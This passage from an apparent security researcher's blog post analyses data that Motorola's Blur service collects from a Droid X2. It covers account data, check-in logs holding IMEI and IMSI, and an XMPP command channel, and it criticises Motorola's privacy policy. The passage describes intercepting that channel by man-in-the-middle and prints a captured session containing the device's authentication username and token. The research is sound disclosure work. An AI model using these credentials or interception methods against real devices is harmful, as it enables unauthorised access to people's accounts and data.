a request is made for an access token, and as far as I can tell, the actual account password is never sent to Motorola. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Photobucket and Picasa data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Yahoo Mail address [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Flickr Similar to the Yahoo Mail results, but actually one step better - an explicit Flickr prompt appears indicating what permissions Motorola's system is asking for on behalf of the user. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Flickr [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Permission screen [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] The Flickr integration behaves the way every other part of Motorola's Blur service should. [/TD] [/TR] [/TABLE] GMail/Google Interestingly, no data seemed to be sent to Motorola about this type of account. Unfortunately, if anyone adds a Youtube or Picasa account, they've sent their GMail/Google+ credentials to Motorola anyway. Also interestingly, while testing Picasa and/or Youtube integration, Motorola's methods of authenticating actually tripped Google's suspicious activity alarm. Looking up the source IP in ARIN confirmed the connection was coming from Motorola. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Google: on guard against suspicious vendors [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Suspicious activity detected [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Source of the suspicious activity confirmed [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Firefox sync No data seems to pass through Motorola's servers. News / RSS RSS feeds that are subscribed to using the built-in News application are proxied through Motorola's servers over unencrypted HTTP. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Photobucket and Picasa data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] RSS / News sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Other data Every few minutes, my phone sends Motorola a detailed description of my home screen/workspace configuration - all of the shortcuts and widgets I have on it. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Home screen configuration and other data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Home screen configuration [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Universal account IDs [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] "Universal account IDs"? Is that why I only see some data sent the very first time I configure a particular account on my phone? [/TD] [/TR] [/TABLE] Analysis - "check-in" data As I was looking through the data I've already mentioned, I noticed chunks of "check-in" data which was a binary upload, and I thought I'd see if it was in some sort of standard compressed format. As it turns out, it is - the 0x1F8B highlighted below is the header for a block of gzip-compressed data. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] GZip compressed-data header embedded in check-in data [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] GZip header (0X1F8B) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] What is contained in this data are essentially debug-level log entries from the device. The battery drain and bandwidth use from having the phone set up like this must be unbelievable. Most of the data that's uploaded is harmless or low-risk on its own - use statistics, and so on. However, this is another mechanism by which Motorola's servers are collecting information like account names/email addresses, and the sheer volume and variety of other data makes me concerned that Motorola's staff apparently care so much about how I'm using my phone. If this were a corporate-owned device, I would expect the owning corporation to have this level of system data collection enabled, but it concerns me that it's being silently collected from my personal device, and that there is no way to disable it. Information that is definitely being collected The IMEI and IMSI of the phone. These are referred to as MEID and MIN in the phone's UI and on the label in the battery compartment, but IMEI and IMSI in the logs. I believe these two values are all that's needed to clone a phone, if someone were to intercept the traffic. The phone number of the phone, and carrier information (e.g. Verizon). The barcode from inside the battery compartment. Applications included with the device as well as installed by the user. Statistics about how those applications are used (e.g. how much data each one has sent and received). Phone call and text message statistics. For example, how many calls have been received or missed. Bluetooth device pairing and unpairing, including detailed information about those devices. Email addresses/usernames for accounts configured on the device. Contact statistics (e.g. how many contacts are synced from Google, how many Facebook users are friends of the account I've configured on the device). Device-level event logs (these are sent to Google as well by a Google-developed checkin mechanism). Debugging/troubleshooting information about most activities the phone engages in. Signal strengths statistics and data use for each type of radio included in the device. For example, bytes sent/received via 3G versus wifi. Stack memory and register dumps related to applications which have crashed. For Exchange ActiveSync setup, the server name and email address, as well as the details of the security policy enforced by that EAS server. Information that may be being collected The terms-of-use/privacy policy for the Blur service (whether you know you're using it or not) explicitly specify that location information (e.g. GPS coordinates) may be collected (see Speaking of that privacy policy..., below). I have not seen this in the data I've intercepted. This may be due to it being represented in a non-obvious format, or it may only be collected under certain conditions, or it may only be collected by newer devices than my 2-year-old Droid X2. While I have no conclusive evidence, I did notice while adding and removing accounts from my phone that the account ID number for a newly-added account is always higher than that for any accounts that existed previously on the device, even if those accounts have been deleted. This implies to me that Motorola's Blur service may be storing information about the accounts I've "deleted" even though they're no longer visible to me. This seems even more likely given the references in the communication to "universalAccountIds" and "knownAccountIds" referenced by GUID/UUID-like values. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Check-in data being sent to Motorola [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Application use stats [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Basic hardware properties [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Bluetooth headset use-tracking [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Data use, SMS text, contact, and CPU stats [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Label in the battery compartment of my phone [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] BlurID, IMEI and barcode (from label), IMSI and phone number [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EAS setup information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EAS policy elements [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Email and Disk Stats [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Event logs (these are also captured by Google) [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Image upload bug [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Logging of newly-installed applications [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Missed calls [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] I told you it was syncing every nine minutes! [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Possible client-side SQL injection vulnerability [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Radio and per-application stats (e.g. CPU use by app) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Register and stack memory dump [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Sync App IDs: 10, 31, 80 [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Sync App IDs: 40, 70, 20, 2, 60, and 5 [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] System panic auto-reboot [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] The "sync app ID" information will become more important in the section about XMPP. The system panic messge has all of the regular boot information as well as the reason for the OS auto-reboot (in my case, apparently there is a problem with the modem). [/TD] [/TR] [/TABLE] Analysis - Jabber / XMPP stream communication In some of the check-in logs, I saw entries that read e.g.: XMPPConnection: Preparing to connect user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222 XMPPConnectionManager I:onConfigurationUpdate: entered XMPPConnectionManager I:onConfigurationUpdate: exiting WSBase I:mother told us it's okay to retry the waiting requests: 0 NormalAsyncConnection I:Connected local addr: 192.168.253.10/192.168.253.10:60737 to remote addr: jabber-cloud112-blur.svcmot.com/69.10.176.46:5222 TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 212 bytes of data with 0 bytes remaining. TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 202 bytes into buffer TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 262 bytes into buffer TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 78 bytes of data with 0 bytes remaining. TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 1448 bytes into buffer TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 2896 bytes into buffer XMPPConnection I:Finished connecting user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222 By running a network capture, I was able to confirm that my phone was regularly attempting this type of connection. However, it was encrypted using TLS, so I couldn't see the content of the communication at first. The existence of this mechanism made me extremely curious. Why did Motorola need yet another communication channel for my phone to talk to them over? Why were they using a protocol intended for instant messaging/chat? The whole thing sounded very much like a botnet (which often use IRC in this way) to me. Intercepting these communications ended up being much more work than I expected. XMPP is an XML-based protocol, and cannot be proxied by an HTTP/HTTPS proxy, so using Burp Suite or ZAP was out. My first thought was to use Mallory, an intercepting transparent proxy that I learned about in the outstanding SANS SEC 642 class back in the March of 2013. Mallory is a relatively new tool, and is somewhat finnicky to get set up, but I learned a lot doing so. Unfortunately, XMPP is not a protocol that Mallory can intercept as of this writing. The VM that I built to run Mallory on still proved useful in this case, as I was eventually able to hack together a custom XMPP man-in-the-middle exploit and view the contents of the traffic. If you'd like to know more about the details, they're in the Steps to reproduce - XMPP communication channel section further down this page. This channel is at least part of the Motorola Blur command-and-control mechanism. I haven't seen enough distinct traffic pass through it to have a good idea of the full extent of its capabilities, but I know that: The XMPP/Jabber protocol is re-purposed for command-and-control use. For example, certain types of message are sent using the field normally used for "presence" status in IM. The values exchanged in the presence fields appear to be very short (five-character) base64-encoded binary data, followed by a dash, and then a sequence number. For example, 4eTO3-52, Ugs6j-10, or t2bcA-0. The base64 value appears to be selected at boot. The sequence number is incremented differently based on criteria I don't understand (yet), but the most common step I've seen is +4. As long as the channel is open, the phone will check in with Motorola every nine minutes. At least one type of Motorola-to-phone command exists: a trigger to update software by ID number. At least three such ID numbers exist: 31, 40, and 70 (see the table below). Each of these trigger an HTTP post request to the blur-services-1.0/ws/sync API method seen in the previous section, and the same IDs are logged in the check-in data. The stream token and username passed to the service are the "blurid" value (represented as a decimal number) which shows up in various places in the other traffic between the phone and Motorola. [TABLE=class: ContentTable] [TR] [TD=class: Header] ID [/TD] [TD=class: Header] Name [/TD] [TD=class: Header] Purpose [/TD] [TD=class: Header] Data Format [/TD] [TD=class: Header] Observed In Testing? [/TD] [/TR] [TR] [TD=class: Data] 2 [/TD] [TD=class: Data] BlurSettingsSyncHandler [/TD] [TD=class: Data] Unknown [/TD] [TD=class: Data] JSON [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 5 [/TD] [TD=class: Data] BlurSetupSyncHandler [/TD] [TD=class: Data] Unverified - called when a new type of sync needs to be added? [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 10 [/TD] [TD=class: Data] BlurContactsSyncHandler [/TD] [TD=class: Data] Syncs contact information (e.g. Google account contacts) [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 20 [/TD] [TD=class: Data] SNMailSyncHandler [/TD] [TD=class: Data] Unverified - probably syncs private messages from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 31 [/TD] [TD=class: Data] StatusSyncHandler [/TD] [TD=class: Data] Syncs current status/most-recent-post information from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 40 [/TD] [TD=class: Data] BlurSNFriendsSyncHandler [/TD] [TD=class: Data] Syncs friend information from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 50 [/TD] [TD=class: Data] NewsRetrievalService [/TD] [TD=class: Data] Syncs news feeds set up in the built-in Motorola app [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 60 [/TD] [TD=class: Data] AdminFlunkySyncHandler [/TD] [TD=class: Data] Unverified - sounds like some sort of remote-support functionality [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 70 [/TD] [TD=class: Data] FeedReceiverService [/TD] [TD=class: Data] Unknown [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 80 [/TD] [TD=class: Data] SNCommentsSyncHandler [/TD] [TD=class: Data] Syncs status/comment information from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [/TABLE] The "gpb" data format is how that type of binary encoding is referred to internally by the client logs. I believe it is similar (possibly identical) to Google's "protocol buffer" system. Here is an example session, including the SYNC APP command being sent by the server. Traffic from the client is represented in red. Traffic from the server is coloured blue. <stream:stream token="XXXXXXXXXXXXXXXX" to="jabber-cloud112-blur.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"/> <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0"> <stream:features><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"></starttls><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features><proceed xmlns="urn:ietf:params:xml:ns:xmpp-tls"/> [Communication after this point takes place over the encrypted channel which the client and server have negotiated.] <stream:stream token="XXXXXXXXXXXXXXXX" to="xmpp.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"> <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0"><stream:features><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features> <iq id="4eTO3-24" type="set"><query xmlns="jabber:iq:auth"><username>4503600105521277</username><password>1-d052e26d5bbb5b4adce7965e3e248a331765623714</password><resource>BlurDevice</resource></query></iq><iq id="4eTO3-25" type="get"><query xmlns="jabber:iq:roster"></query></iq><presence id="4eTO3-26"></presence> <iq type="result" id="4eTO3-24"/> <message xmlns="urn:xmpp:motorola:motodata" id="0J8Hc-30570875" to="XXXXXXXXXXXXXXXX@jabber01.mm211.dc2b.svcmot.com"><data xmlns="com:motorola:blur:push:data:1">{"Sync":{"APP":[{"d":"sync_app_id: 31\n","q":0}]}}</data></message> [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] XMPP communication channel [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] XMPPPeek in action [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 31 (social networking status) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 40 (friends) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 50 (news) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 80 (social networking comments and status) sync [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] A few examples of the sync operations triggered by the XMPP communication channel. [/TD] [/TR] [/TABLE] While I have seen very little sensitive data being sent as a result of this mechanism, Motorola's privacy policy/terms-of-service related to this system makes me more concerned. There is literally no reason I can think of that I would want my phone to check in with Motorola every nine minutes to see if Motorola has any new instructions for it to execute. Is there some sort of remote-control capability intended for use by support staff? I know there is a device-location and remote wipe function, because those are advertised as features of Blur (apparently even if you didn't explicitly sign up for Blur). Speaking of that privacy policy... I honestly can't remember if I explicitly agreed to any sort of EULA when I originally set up my phone. There are numerous "terms of service" and "privacy policy" documents on the Motorola website which all seem designed to look superficially identical, but this one in particular (the one for the actual "Motorola Mobile Services" system (AKA "Blur")) has a lot of content I really don't like, and which is not present in the other, similar documents on their site that are much easier to find. For example, it specifically mentions capturing social networking credentials, as well as uploading GPS coordinates from customers' phones to Motorola. It is specific to "Motorola Mobile Services", and I know I didn't explicitly sign up for that type of account (which is probably why my phone is using a randomly-generated username and password to connect). I also know that even if I was presented with a lengthy statement which included statements about storing social media credentials, that happened when I originally bought the phone (about two years ago). Should I not have been at least reminded of this when I went to add a social networking account for the first time? Or at a bare minimum, should my phone not let me view any document I allegedly agreed to? The only reason I know of that particular TOS is because I found it referenced in a Motorola forum discussion about privacy concerns. In any case, here are some interesting excerpts from that document (as of 22 June, 2013). All bold emphasis is mine. I am not a lawyer, and this is not legal advice. Using the MOTOROLA MOBILE SERVICES software and services (MOTOROLA MOBILE SERVICES) constitutes your acceptance of the terms of the Agreement without modification. If you do not accept the terms of the Agreement, then you may not use MOTOROLA MOBILE SERVICES. Motorola collects and uses certain information about you and your mobile device ... (1) your device's unique serial number ... (5) when your device experiences a software crash ... (1) use of hardware functions like the accelerometer, GPS, wireless antennas, and touchscreen; (2) wireless carrier and network information; (3) use of accessories like headsets and docks; (4) data usage ... Personal Information such as: (1) your email and social network account credentials; (2) user settings and preferences; (3) your email and social network contacts; (4) your mobile phone number; and (5) the performance of applications installed on your device. ... MOTOROLA MOBILE SERVICES will never collect the specific content of your communications or copies of your files. The document makes a promise that the content of communications are not collected, but I have screenshots and raw data that show Facebook and Twitter messages as well as photos passing through their servers. The agreement specifies "when your device experiences a software crash", not "memory dumps taken at the time of a software crash", which are what is actually collected. Motorola takes privacy protection seriously. MOTOROLA MOBILE SERVICES only collects personal information, social network profile data, and information about websites you visit if you create a MotoCast ID, use the preinstalled web browser and/or MOTOROLA MOBILE SERVICES applications and widgets like Messaging, Gallery, Music Player, Social Networking and Social Status. If you use non-Motorola applications for email, social networking, sharing content with your friends, and web browsing, then MOTOROLA MOBILE SERVICES will not collect this information. Even if you decline to use the preinstalled browser or the MOTOROLA MOBILE SERVICES applications and widgets, your device will continue to collect information about the performance of your mobile device and how you use your mobile device unless you choose to opt out. In non-Motorola builds of Android, most/all of those components are still present, but none of them send data to Motorola. Some people might think it was extremely deceptive to add data collection to those components but not make user-visible changes to them that mentioned this. Oh, and of course the OS is still collecting massive amounts of data even if you don't use the modified basic Android functionality. MOTOROLA MOBILE SERVICES only collects and uses information about the location of your mobile device if you have enabled one or more location-based services, such as your device's GPS antenna, Google Location Services, or a carrier-provided location service. If you turn these features off in your mobile device's settings, MOTOROLA MOBILE SERVICES will not record the location of your mobile device. So what you're saying is that all I have to do to prevent Motorola from tracking my physical location is disable core functionality on my device and leave it off permanently? Awesome! Thanks so much! The security of your information is important to Motorola. When MOTOROLA MOBILE SERVICES transmits information from your mobile device to Motorola, MOTOROLA MOBILE SERVICES encrypts the transmission of that information using secure socket layer technology (SSL). Except when it doesn't, which is most of the time. However, no data stored on a mobile device or transmitted over a wireless or interactive network can ever be 100 percent secure, and many of the communications you make using MOTOROLA MOBILE SERVICES will be accessible to third parties. You should therefore be cautious when submitting any personally identifiable information using MOTOROLA MOBILE SERVICES, and you understand that you are using MOTOROLA MOBILE SERVICES at your own risk. As a global company, Motorola has international sites and users all over the world. The personal information you provide may be transmitted, used, stored, and otherwise processed outside of the country where you submitted that information, including jurisdictions that may not have data privacy laws that provide equivalent protection to such laws in your home country. You may not ... interfere with anyone's ... enjoyment of the Services Uh oh. That document does mention that anyone who wants to opt-out can email privacy@motorola.com. If you have any luck with that, please let me know. Why this is a problem While I'm sure there are a few people out there who don't mind a major multinational corporation collecting this sort of detailed tracking information related to where their phone has been and how it's been used, I believe most people would at least like to be asked about participating in this type of activity, and be given an option to turn it off. I can think of many ways that Motorola, unethical employees of Motorola, or unauthorized third parties could misuse this enormous treasure trove of information. But the biggest question on my mind is this: now that it is known that Motorola is collecting this data, can it be subpoenaed in criminal or civil cases against owners of Motorola phones? That seems like an enormous can of worms, even in comparison to the possibilities for identity theft that Motorola's system provides for. How secure is Motorola's Blur web service against attack? I'd be really interested to test this myself, but made no attempt to do so because I don't have permission and Motorola doesn't appear to have a "white hat"/"bug bounty" programme. It would be a tempting target for technically-skilled criminals, due to the large volume of Facebook, Twitter, and Google usernames and passwords stored in it. The fact that the phone actively polls Motorola for new instructions to execute and then follows those instructions without informing its owner opens all of these phones up to automated takeover by anyone who can obtain a signing SSL certificate issued by one of the authorities in the trusted CA store on those phones. Some people may consider this far-fetched, but consider that certificates of that type have been mistakenly issued in the past, and the root certificate for at least one of the CA's responsible for that type of mistake (TURKTRUST) were installed on my phone at the factory. Is there anything good to be found here? Motorola does appear to be using reasonably-strong authentication for the oAuth login to their system - the username seems to be a combination of the IMEI and a random number (16 digits long[2], in the case of my phone's username), and the password is a 160-bit value represented as a hex string. This would be essentially impossible to attack via brute-force if the value really is random. Due to its length, I'm concerned it's a hash of a fixed attribute of the phone, but that's just a hunch. The non-oAuth components (e.g. XMPP) use the Blur ID as the username, and that is all over the place, e.g. in virtually every URL (HTTP and HTTPS) that the client accesses on the Blur servers. When uploading images to social networking sites, the Motorola software on the phone sometimes strips the EXIF tags (including geolocation tags) before uploading the image to Motorola. So at least they can't always use that as another method for determining your location. Finally, both the XMPP and HTTPS client components of the software do validate that the certificates used for encrypted communication were issued by authorities the phone is configured to trust. If the certificate presented to either component is not trusted, then no encrypted channel is established, and data which would be sent over it is queued until a trusted connection can be made. If someone wants to perform a man-in-the-middle attack, they're going to need to get their root CA cert loaded on the target phones, or obtain a signing cert issued by a trusted authority (e.g. TURKTRUST). [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] At least their software checks SSL cert validity [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Untrusted cert - HTTPS client [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Untrusted cert - XMPP client [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Has anyone else discovered this? In January of 2012, a participant in a Motorola pre-release test discovered that Motorola was performing device-tracking after a Motorola support representative mentioned that the tester had reset his phone "21 times", and a forum moderator directed him to the special, hard-to-find Motorola privacy policy discussed above. To my knowledge, this article is the first disclosure of anything like the full extent of the data Motorola collects. What I am going to do as a result of this discovery As of 23 June 2013, I've removed my ActiveSync configuration from the phone, because I can't guarantee that proprietary corporate information isn't being funneled through Motorola's servers. I know that some information (like the name of our ActiveSync server, our domain name, and a few examples of our account-naming conventions) is, but I don't have time to exhaustively test to see what else is being sent their way, or to do that every time the phone updates its configuration. I've also deleted the IMAP configuration that connected to my personal email, and have installed K-9 Mail as a temporary workaround. I'm going to figure out how to root this phone and install a "clean" version of Android. That will mean I can't use ActiveSync (my employer doesn't allow rooted phones to connect), which means a major reason I use my phone will disappear, but better that than risk sending their data to Motorola. I'll assume that other manufacturers and carriers have their own equivalent of this - recall the Carrier IQ revelation from 2011. Which other models of Motorola device do this? Right now, I have only tested my Droid X2. If you have a Motorola device and are technically-inclined, the steps to reproduce my testing are in the section below. If you get results either way and would like me to include them here, please get in touch with me using the Contact form. Please include the model of your 